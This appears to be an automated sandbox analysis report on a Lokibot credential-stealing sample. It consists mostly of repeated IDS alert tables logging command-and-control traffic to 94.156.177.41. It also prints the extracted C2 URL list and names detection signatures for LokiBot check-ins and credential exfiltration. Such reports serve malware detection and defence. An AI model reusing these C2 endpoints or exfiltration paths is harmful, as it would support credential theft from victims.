                      2024-11-28T13:53:48.954029+010020254831A Network Trojan was detected94.156.177.4180192.168.2.549948TCP
                      2024-11-28T13:53:50.857824+010020254831A Network Trojan was detected94.156.177.4180192.168.2.549951TCP
                      2024-11-28T13:53:52.724013+010020254831A Network Trojan was detected94.156.177.4180192.168.2.549954TCP
                      2024-11-28T13:53:54.624745+010020254831A Network Trojan was detected94.156.177.4180192.168.2.549959TCP
                      2024-11-28T13:53:56.476885+010020254831A Network Trojan was detected94.156.177.4180192.168.2.549965TCP
                      2024-11-28T13:53:58.209770+010020254831A Network Trojan was detected94.156.177.4180192.168.2.549970TCP
                      2024-11-28T13:54:00.112160+010020254831A Network Trojan was detected94.156.177.4180192.168.2.549975TCP
                      2024-11-28T13:54:01.933027+010020254831A Network Trojan was detected94.156.177.4180192.168.2.549979TCP
                      2024-11-28T13:54:03.631691+010020254831A Network Trojan was detected94.156.177.4180192.168.2.549984TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-28T13:52:09.514500+010020243131Malware Command and Control Activity Detected192.168.2.54971194.156.177.4180TCP
                      2024-11-28T13:52:11.594715+010020243131Malware Command and Control Activity Detected192.168.2.54971294.156.177.4180TCP
                      2024-11-28T13:52:13.292548+010020243131Malware Command and Control Activity Detected192.168.2.54971394.156.177.4180TCP
                      2024-11-28T13:52:15.014454+010020243131Malware Command and Control Activity Detected192.168.2.54971494.156.177.4180TCP
                      2024-11-28T13:52:16.819103+010020243131Malware Command and Control Activity Detected192.168.2.54971594.156.177.4180TCP
                      2024-11-28T13:52:18.734775+010020243131Malware Command and Control Activity Detected192.168.2.54971894.156.177.4180TCP
                      2024-11-28T13:52:20.433012+010020243131Malware Command and Control Activity Detected192.168.2.54972194.156.177.4180TCP
                      2024-11-28T13:52:22.280016+010020243131Malware Command and Control Activity Detected192.168.2.54972494.156.177.4180TCP
                      2024-11-28T13:52:24.172204+010020243131Malware Command and Control Activity Detected192.168.2.54972694.156.177.4180TCP
                      2024-11-28T13:52:25.972126+010020243131Malware Command and Control Activity Detected192.168.2.54972794.156.177.4180TCP
                      2024-11-28T13:52:27.874307+010020243131Malware Command and Control Activity Detected192.168.2.54973394.156.177.4180TCP
                      2024-11-28T13:52:29.593699+010020243131Malware Command and Control Activity Detected192.168.2.54973994.156.177.4180TCP
                      2024-11-28T13:52:31.306295+010020243131Malware Command and Control Activity Detected192.168.2.54974594.156.177.4180TCP
                      2024-11-28T13:52:33.012667+010020243131Malware Command and Control Activity Detected192.168.2.54975094.156.177.4180TCP
                      2024-11-28T13:52:35.032116+010020243131Malware Command and Control Activity Detected192.168.2.54975194.156.177.4180TCP
                      2024-11-28T13:52:36.795234+010020243131Malware Command and Control Activity Detected192.168.2.54975794.156.177.4180TCP
                      2024-11-28T13:52:38.452387+010020243131Malware Command and Control Activity Detected192.168.2.54976294.156.177.4180TCP
                      2024-11-28T13:52:40.154060+010020243131Malware Command and Control Activity Detected192.168.2.54976894.156.177.4180TCP
                      2024-11-28T13:52:41.957950+010020243131Malware Command and Control Activity Detected192.168.2.54977194.156.177.4180TCP
                      2024-11-28T13:52:43.776505+010020243131Malware Command and Control Activity Detected192.168.2.54977594.156.177.4180TCP
                      2024-11-28T13:52:45.678418+010020243131Malware Command and Control Activity Detected192.168.2.54978194.156.177.4180TCP
                      2024-11-28T13:52:47.491806+010020243131Malware Command and Control Activity Detected192.168.2.54978594.156.177.4180TCP
                      2024-11-28T13:52:49.519282+010020243131Malware Command and Control Activity Detected192.168.2.54979194.156.177.4180TCP
                      2024-11-28T13:52:51.273383+010020243131Malware Command and Control Activity Detected192.168.2.54979794.156.177.4180TCP
                      2024-11-28T13:52:53.173277+010020243131Malware Command and Control Activity Detected192.168.2.54980194.156.177.4180TCP
                      2024-11-28T13:52:55.119928+010020243131Malware Command and Control Activity Detected192.168.2.54980694.156.177.4180TCP
                      2024-11-28T13:52:57.817541+010020243131Malware Command and Control Activity Detected192.168.2.54981194.156.177.4180TCP
                      2024-11-28T13:52:59.638447+010020243131Malware Command and Control Activity Detected192.168.2.54981894.156.177.4180TCP
                      2024-11-28T13:53:01.635518+010020243131Malware Command and Control Activity Detected192.168.2.54982494.156.177.4180TCP
                      2024-11-28T13:53:03.488071+010020243131Malware Command and Control Activity Detected192.168.2.54982994.156.177.4180TCP
                      2024-11-28T13:53:05.350722+010020243131Malware Command and Control Activity Detected192.168.2.54983394.156.177.4180TCP
                      2024-11-28T13:53:07.207826+010020243131Malware Command and Control Activity Detected192.168.2.54983794.156.177.4180TCP
                      2024-11-28T13:53:09.114132+010020243131Malware Command and Control Activity Detected192.168.2.54984094.156.177.4180TCP
                      2024-11-28T13:53:11.552901+010020243131Malware Command and Control Activity Detected192.168.2.54984594.156.177.4180TCP
                      2024-11-28T13:53:13.408228+010020243131Malware Command and Control Activity Detected192.168.2.54985194.156.177.4180TCP
                      2024-11-28T13:53:15.303148+010020243131Malware Command and Control Activity Detected192.168.2.54985794.156.177.4180TCP
                      2024-11-28T13:53:16.968396+010020243131Malware Command and Control Activity Detected192.168.2.54986294.156.177.4180TCP
                      2024-11-28T13:53:18.852419+010020243131Malware Command and Control Activity Detected192.168.2.54986794.156.177.4180TCP
                      2024-11-28T13:53:20.910013+010020243131Malware Command and Control Activity Detected192.168.2.54987194.156.177.4180TCP
                      2024-11-28T13:53:22.780609+010020243131Malware Command and Control Activity Detected192.168.2.54987794.156.177.4180TCP
                      2024-11-28T13:53:24.492850+010020243131Malware Command and Control Activity Detected192.168.2.54988294.156.177.4180TCP
                      2024-11-28T13:53:26.320757+010020243131Malware Command and Control Activity Detected192.168.2.54988894.156.177.4180TCP
                      2024-11-28T13:53:28.140273+010020243131Malware Command and Control Activity Detected192.168.2.54989394.156.177.4180TCP
                      2024-11-28T13:53:30.067360+010020243131Malware Command and Control Activity Detected192.168.2.54989794.156.177.4180TCP
                      2024-11-28T13:53:32.107303+010020243131Malware Command and Control Activity Detected192.168.2.54990294.156.177.4180TCP
                      2024-11-28T13:53:33.909974+010020243131Malware Command and Control Activity Detected192.168.2.54990894.156.177.4180TCP
                      2024-11-28T13:53:35.792109+010020243131Malware Command and Control Activity Detected192.168.2.54991394.156.177.4180TCP
                      2024-11-28T13:53:37.671479+010020243131Malware Command and Control Activity Detected192.168.2.54991794.156.177.4180TCP
                      2024-11-28T13:53:39.517673+010020243131Malware Command and Control Activity Detected192.168.2.54992394.156.177.4180TCP
                      2024-11-28T13:53:41.214371+010020243131Malware Command and Control Activity Detected192.168.2.54992894.156.177.4180TCP
                      2024-11-28T13:53:43.433051+010020243131Malware Command and Control Activity Detected192.168.2.54993194.156.177.4180TCP
                      2024-11-28T13:53:45.291369+010020243131Malware Command and Control Activity Detected192.168.2.54993694.156.177.4180TCP
                      2024-11-28T13:53:47.149209+010020243131Malware Command and Control Activity Detected192.168.2.54994294.156.177.4180TCP
                      2024-11-28T13:53:48.834119+010020243131Malware Command and Control Activity Detected192.168.2.54994894.156.177.4180TCP
                      2024-11-28T13:53:50.737812+010020243131Malware Command and Control Activity Detected192.168.2.54995194.156.177.4180TCP
                      2024-11-28T13:53:52.603990+010020243131Malware Command and Control Activity Detected192.168.2.54995494.156.177.4180TCP
                      2024-11-28T13:53:54.504785+010020243131Malware Command and Control Activity Detected192.168.2.54995994.156.177.4180TCP
                      2024-11-28T13:53:56.356808+010020243131Malware Command and Control Activity Detected192.168.2.54996594.156.177.4180TCP
                      2024-11-28T13:53:58.089738+010020243131Malware Command and Control Activity Detected192.168.2.54997094.156.177.4180TCP
                      2024-11-28T13:53:59.992228+010020243131Malware Command and Control Activity Detected192.168.2.54997594.156.177.4180TCP
                      2024-11-28T13:54:01.812286+010020243131Malware Command and Control Activity Detected192.168.2.54997994.156.177.4180TCP
                      2024-11-28T13:54:03.511707+010020243131Malware Command and Control Activity Detected192.168.2.54998494.156.177.4180TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-28T13:52:04.479690+010020216411A Network Trojan was detected192.168.2.54970894.156.177.4180TCP
                      2024-11-28T13:52:06.410511+010020216411A Network Trojan was detected192.168.2.54970994.156.177.4180TCP
                      2024-11-28T13:52:08.237689+010020216411A Network Trojan was detected192.168.2.54971194.156.177.4180TCP
                      2024-11-28T13:52:10.072483+010020216411A Network Trojan was detected192.168.2.54971294.156.177.4180TCP
                      2024-11-28T13:52:11.973667+010020216411A Network Trojan was detected192.168.2.54971394.156.177.4180TCP
                      2024-11-28T13:52:13.689499+010020216411A Network Trojan was detected192.168.2.54971494.156.177.4180TCP
                      2024-11-28T13:52:15.393770+010020216411A Network Trojan was detected192.168.2.54971594.156.177.4180TCP
                      2024-11-28T13:52:17.219155+010020216411A Network Trojan was detected192.168.2.54971894.156.177.4180TCP
                      2024-11-28T13:52:19.113785+010020216411A Network Trojan was detected192.168.2.54972194.156.177.4180TCP
                      2024-11-28T13:52:20.813749+010020216411A Network Trojan was detected192.168.2.54972494.156.177.4180TCP
                      2024-11-28T13:52:22.659042+010020216411A Network Trojan was detected192.168.2.54972694.156.177.4180TCP
                      2024-11-28T13:52:24.549789+010020216411A Network Trojan was detected192.168.2.54972794.156.177.4180TCP
                      2024-11-28T13:52:26.365633+010020216411A Network Trojan was detected192.168.2.54973394.156.177.4180TCP
                      2024-11-28T13:52:28.268944+010020216411A Network Trojan was detected192.168.2.54973994.156.177.4180TCP
                      2024-11-28T13:52:29.992184+010020216411A Network Trojan was detected192.168.2.54974594.156.177.4180TCP
                      2024-11-28T13:52:31.691657+010020216411A Network Trojan was detected192.168.2.54975094.156.177.4180TCP
                      2024-11-28T13:52:33.568487+010020216411A Network Trojan was detected192.168.2.54975194.156.177.4180TCP
                      2024-11-28T13:52:35.425401+010020216411A Network Trojan was detected192.168.2.54975794.156.177.4180TCP
                      2024-11-28T13:52:37.177766+010020216411A Network Trojan was detected192.168.2.54976294.156.177.4180TCP
                      2024-11-28T13:52:38.836045+010020216411A Network Trojan was detected192.168.2.54976894.156.177.4180TCP
                      2024-11-28T13:52:40.534388+010020216411A Network Trojan was detected192.168.2.54977194.156.177.4180TCP
                      2024-11-28T13:52:42.351772+010020216411A Network Trojan was detected192.168.2.54977594.156.177.4180TCP
                      2024-11-28T13:52:44.168555+010020216411A Network Trojan was detected192.168.2.54978194.156.177.4180TCP
                      2024-11-28T13:52:46.067495+010020216411A Network Trojan was detected192.168.2.54978594.156.177.4180TCP
                      2024-11-28T13:52:48.007586+010020216411A Network Trojan was detected192.168.2.54979194.156.177.4180TCP
                      2024-11-28T13:52:49.915881+010020216411A Network Trojan was detected192.168.2.54979794.156.177.4180TCP
                      2024-11-28T13:52:51.665645+010020216411A Network Trojan was detected192.168.2.54980194.156.177.4180TCP
                      2024-11-28T13:52:53.728329+010020216411A Network Trojan was detected192.168.2.54980694.156.177.4180TCP
                      2024-11-28T13:52:55.529063+010020216411A Network Trojan was detected192.168.2.54981194.156.177.4180TCP
                      2024-11-28T13:52:58.217591+010020216411A Network Trojan was detected192.168.2.54981894.156.177.4180TCP
                      2024-11-28T13:53:00.334231+010020216411A Network Trojan was detected192.168.2.54982494.156.177.4180TCP
                      2024-11-28T13:53:02.019879+010020216411A Network Trojan was detected192.168.2.54982994.156.177.4180TCP
                      2024-11-28T13:53:03.878356+010020216411A Network Trojan was detected192.168.2.54983394.156.177.4180TCP
                      2024-11-28T13:53:05.737923+010020216411A Network Trojan was detected192.168.2.54983794.156.177.4180TCP
                      2024-11-28T13:53:07.602577+010020216411A Network Trojan was detected192.168.2.54984094.156.177.4180TCP
                      2024-11-28T13:53:09.650403+010020216411A Network Trojan was detected192.168.2.54984594.156.177.4180TCP
                      2024-11-28T13:53:11.943752+010020216411A Network Trojan was detected192.168.2.54985194.156.177.4180TCP
                      2024-11-28T13:53:13.787378+010020216411A Network Trojan was detected192.168.2.54985794.156.177.4180TCP
                      2024-11-28T13:53:15.696851+010020216411A Network Trojan was detected192.168.2.54986294.156.177.4180TCP
                      2024-11-28T13:53:17.383644+010020216411A Network Trojan was detected192.168.2.54986794.156.177.4180TCP
                      2024-11-28T13:53:19.396128+010020216411A Network Trojan was detected192.168.2.54987194.156.177.4180TCP
                      2024-11-28T13:53:21.301001+010020216411A Network Trojan was detected192.168.2.54987794.156.177.4180TCP
                      2024-11-28T13:53:23.160248+010020216411A Network Trojan was detected192.168.2.54988294.156.177.4180TCP
                      2024-11-28T13:53:24.944914+010020216411A Network Trojan was detected192.168.2.54988894.156.177.4180TCP
                      2024-11-28T13:53:26.713138+010020216411A Network Trojan was detected192.168.2.54989394.156.177.4180TCP
                      2024-11-28T13:53:28.528184+010020216411A Network Trojan was detected192.168.2.54989794.156.177.4180TCP
                      2024-11-28T13:53:30.675910+010020216411A Network Trojan was detected192.168.2.54990294.156.177.4180TCP
                      2024-11-28T13:53:32.490598+010020216411A Network Trojan was detected192.168.2.54990894.156.177.4180TCP
                      2024-11-28T13:53:34.319262+010020216411A Network Trojan was detected192.168.2.54991394.156.177.4180TCP
                      2024-11-28T13:53:36.174269+010020216411A Network Trojan was detected192.168.2.54991794.156.177.4180TCP
                      2024-11-28T13:53:38.049671+010020216411A Network Trojan was detected192.168.2.54992394.156.177.4180TCP
                      2024-11-28T13:53:39.893533+010020216411A Network Trojan was detected192.168.2.54992894.156.177.4180TCP
                      2024-11-28T13:53:42.038877+010020216411A Network Trojan was detected192.168.2.54993194.156.177.4180TCP
                      2024-11-28T13:53:43.814508+010020216411A Network Trojan was detected192.168.2.54993694.156.177.4180TCP
                      2024-11-28T13:53:45.677207+010020216411A Network Trojan was detected192.168.2.54994294.156.177.4180TCP
                      2024-11-28T13:53:47.609817+010020216411A Network Trojan was detected192.168.2.54994894.156.177.4180TCP
                      2024-11-28T13:53:49.229391+010020216411A Network Trojan was detected192.168.2.54995194.156.177.4180TCP
                      2024-11-28T13:53:51.134807+010020216411A Network Trojan was detected192.168.2.54995494.156.177.4180TCP
                      2024-11-28T13:53:52.989363+010020216411A Network Trojan was detected192.168.2.54995994.156.177.4180TCP
                      2024-11-28T13:53:54.895598+010020216411A Network Trojan was detected192.168.2.54996594.156.177.4180TCP
                      2024-11-28T13:53:56.768164+010020216411A Network Trojan was detected192.168.2.54997094.156.177.4180TCP
                      2024-11-28T13:53:58.476192+010020216411A Network Trojan was detected192.168.2.54997594.156.177.4180TCP
                      2024-11-28T13:54:00.536337+010020216411A Network Trojan was detected192.168.2.54997994.156.177.4180TCP
                      2024-11-28T13:54:02.191446+010020216411A Network Trojan was detected192.168.2.54998494.156.177.4180TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-28T13:52:04.479690+010028257661Malware Command and Control Activity Detected192.168.2.54970894.156.177.4180TCP
                      2024-11-28T13:52:06.410511+010028257661Malware Command and Control Activity Detected192.168.2.54970994.156.177.4180TCP
                      2024-11-28T13:52:08.237689+010028257661Malware Command and Control Activity Detected192.168.2.54971194.156.177.4180TCP
                      2024-11-28T13:52:10.072483+010028257661Malware Command and Control Activity Detected192.168.2.54971294.156.177.4180TCP
                      2024-11-28T13:52:11.973667+010028257661Malware Command and Control Activity Detected192.168.2.54971394.156.177.4180TCP
                      2024-11-28T13:52:13.689499+010028257661Malware Command and Control Activity Detected192.168.2.54971494.156.177.4180TCP
                      2024-11-28T13:52:15.393770+010028257661Malware Command and Control Activity Detected192.168.2.54971594.156.177.4180TCP
                      2024-11-28T13:52:17.219155+010028257661Malware Command and Control Activity Detected192.168.2.54971894.156.177.4180TCP
                      2024-11-28T13:52:19.113785+010028257661Malware Command and Control Activity Detected192.168.2.54972194.156.177.4180TCP
                      2024-11-28T13:52:20.813749+010028257661Malware Command and Control Activity Detected192.168.2.54972494.156.177.4180TCP
                      2024-11-28T13:52:22.659042+010028257661Malware Command and Control Activity Detected192.168.2.54972694.156.177.4180TCP
                      2024-11-28T13:52:24.549789+010028257661Malware Command and Control Activity Detected192.168.2.54972794.156.177.4180TCP
                      2024-11-28T13:52:26.365633+010028257661Malware Command and Control Activity Detected192.168.2.54973394.156.177.4180TCP
                      2024-11-28T13:52:28.268944+010028257661Malware Command and Control Activity Detected192.168.2.54973994.156.177.4180TCP
                      2024-11-28T13:52:29.992184+010028257661Malware Command and Control Activity Detected192.168.2.54974594.156.177.4180TCP
                      2024-11-28T13:52:31.691657+010028257661Malware Command and Control Activity Detected192.168.2.54975094.156.177.4180TCP
                      2024-11-28T13:52:33.568487+010028257661Malware Command and Control Activity Detected192.168.2.54975194.156.177.4180TCP
                      2024-11-28T13:52:35.425401+010028257661Malware Command and Control Activity Detected192.168.2.54975794.156.177.4180TCP
                      2024-11-28T13:52:37.177766+010028257661Malware Command and Control Activity Detected192.168.2.54976294.156.177.4180TCP
                      2024-11-28T13:52:38.836045+010028257661Malware Command and Control Activity Detected192.168.2.54976894.156.177.4180TCP
                      2024-11-28T13:52:40.534388+010028257661Malware Command and Control Activity Detected192.168.2.54977194.156.177.4180TCP
                      2024-11-28T13:52:42.351772+010028257661Malware Command and Control Activity Detected192.168.2.54977594.156.177.4180TCP
                      2024-11-28T13:52:44.168555+010028257661Malware Command and Control Activity Detected192.168.2.54978194.156.177.4180TCP
                      2024-11-28T13:52:46.067495+010028257661Malware Command and Control Activity Detected192.168.2.54978594.156.177.4180TCP
                      2024-11-28T13:52:48.007586+010028257661Malware Command and Control Activity Detected192.168.2.54979194.156.177.4180TCP
                      2024-11-28T13:52:49.915881+010028257661Malware Command and Control Activity Detected192.168.2.54979794.156.177.4180TCP
                      2024-11-28T13:52:51.665645+010028257661Malware Command and Control Activity Detected192.168.2.54980194.156.177.4180TCP
                      2024-11-28T13:52:53.728329+010028257661Malware Command and Control Activity Detected192.168.2.54980694.156.177.4180TCP
                      2024-11-28T13:52:55.529063+010028257661Malware Command and Control Activity Detected192.168.2.54981194.156.177.4180TCP
                      2024-11-28T13:52:58.217591+010028257661Malware Command and Control Activity Detected192.168.2.54981894.156.177.4180TCP
                      2024-11-28T13:53:00.334231+010028257661Malware Command and Control Activity Detected192.168.2.54982494.156.177.4180TCP
                      2024-11-28T13:53:02.019879+010028257661Malware Command and Control Activity Detected192.168.2.54982994.156.177.4180TCP
                      2024-11-28T13:53:03.878356+010028257661Malware Command and Control Activity Detected192.168.2.54983394.156.177.4180TCP
                      2024-11-28T13:53:05.737923+010028257661Malware Command and Control Activity Detected192.168.2.54983794.156.177.4180TCP
                      2024-11-28T13:53:07.602577+010028257661Malware Command and Control Activity Detected192.168.2.54984094.156.177.4180TCP
                      2024-11-28T13:53:09.650403+010028257661Malware Command and Control Activity Detected192.168.2.54984594.156.177.4180TCP
                      2024-11-28T13:53:11.943752+010028257661Malware Command and Control Activity Detected192.168.2.54985194.156.177.4180TCP
                      2024-11-28T13:53:13.787378+010028257661Malware Command and Control Activity Detected192.168.2.54985794.156.177.4180TCP
                      2024-11-28T13:53:15.696851+010028257661Malware Command and Control Activity Detected192.168.2.54986294.156.177.4180TCP
                      2024-11-28T13:53:17.383644+010028257661Malware Command and Control Activity Detected192.168.2.54986794.156.177.4180TCP
                      2024-11-28T13:53:19.396128+010028257661Malware Command and Control Activity Detected192.168.2.54987194.156.177.4180TCP
                      2024-11-28T13:53:21.301001+010028257661Malware Command and Control Activity Detected192.168.2.54987794.156.177.4180TCP
                      2024-11-28T13:53:23.160248+010028257661Malware Command and Control Activity Detected192.168.2.54988294.156.177.4180TCP
                      2024-11-28T13:53:24.944914+010028257661Malware Command and Control Activity Detected192.168.2.54988894.156.177.4180TCP
                      2024-11-28T13:53:26.713138+010028257661Malware Command and Control Activity Detected192.168.2.54989394.156.177.4180TCP
                      2024-11-28T13:53:28.528184+010028257661Malware Command and Control Activity Detected192.168.2.54989794.156.177.4180TCP
                      2024-11-28T13:53:30.675910+010028257661Malware Command and Control Activity Detected192.168.2.54990294.156.177.4180TCP
                      2024-11-28T13:53:32.490598+010028257661Malware Command and Control Activity Detected192.168.2.54990894.156.177.4180TCP
                      2024-11-28T13:53:34.319262+010028257661Malware Command and Control Activity Detected192.168.2.54991394.156.177.4180TCP
                      2024-11-28T13:53:36.174269+010028257661Malware Command and Control Activity Detected192.168.2.54991794.156.177.4180TCP
                      2024-11-28T13:53:38.049671+010028257661Malware Command and Control Activity Detected192.168.2.54992394.156.177.4180TCP
                      2024-11-28T13:53:39.893533+010028257661Malware Command and Control Activity Detected192.168.2.54992894.156.177.4180TCP
                      2024-11-28T13:53:42.038877+010028257661Malware Command and Control Activity Detected192.168.2.54993194.156.177.4180TCP
                      2024-11-28T13:53:43.814508+010028257661Malware Command and Control Activity Detected192.168.2.54993694.156.177.4180TCP
                      2024-11-28T13:53:45.677207+010028257661Malware Command and Control Activity Detected192.168.2.54994294.156.177.4180TCP
                      2024-11-28T13:53:47.609817+010028257661Malware Command and Control Activity Detected192.168.2.54994894.156.177.4180TCP
                      2024-11-28T13:53:49.229391+010028257661Malware Command and Control Activity Detected192.168.2.54995194.156.177.4180TCP
                      2024-11-28T13:53:51.134807+010028257661Malware Command and Control Activity Detected192.168.2.54995494.156.177.4180TCP
                      2024-11-28T13:53:52.989363+010028257661Malware Command and Control Activity Detected192.168.2.54995994.156.177.4180TCP
                      2024-11-28T13:53:54.895598+010028257661Malware Command and Control Activity Detected192.168.2.54996594.156.177.4180TCP
                      2024-11-28T13:53:56.768164+010028257661Malware Command and Control Activity Detected192.168.2.54997094.156.177.4180TCP
                      2024-11-28T13:53:58.476192+010028257661Malware Command and Control Activity Detected192.168.2.54997594.156.177.4180TCP
                      2024-11-28T13:54:00.536337+010028257661Malware Command and Control Activity Detected192.168.2.54997994.156.177.4180TCP
                      2024-11-28T13:54:02.191446+010028257661Malware Command and Control Activity Detected192.168.2.54998494.156.177.4180TCP

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: 00000000.00000002.2053905676.00000000039E9000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "94.156.177.41/soja/five/fre.php"]}
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeReversingLabs: Detection: 47%
                      Source: FVR-N2411-07396.exeReversingLabs: Detection: 47%
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeJoe Sandbox ML: detected
                      Source: FVR-N2411-07396.exeJoe Sandbox ML: detected
                      Source: FVR-N2411-07396.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: FVR-N2411-07396.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: yRKC.pdbSHA256z3 source: FVR-N2411-07396.exe, ZeJFfrYmOnJKS.exe.0.dr
                      Source: Binary string: yRKC.pdb source: FVR-N2411-07396.exe, ZeJFfrYmOnJKS.exe.0.dr
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeCode function: 4x nop then jmp 0720B48Bh0_2_0720AD0B
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeCode function: 4x nop then jmp 0810A733h8_2_08109FB3

                      Networking

                      barindex
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49718 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49712 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49745 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49714 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49718 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49714 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49751 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49713 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49715 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49713 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49713 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49708 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49711 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49712 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49726 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49712 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49715 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49715 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49718 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49708 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49708 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49727 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49727 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49727 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49721 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49724 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49721 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49721 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49712 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.5:49708 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49745 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49751 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49751 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49709 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49709 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49709 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49739 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49714 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49739 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49733 -> 94.156.177.41:80
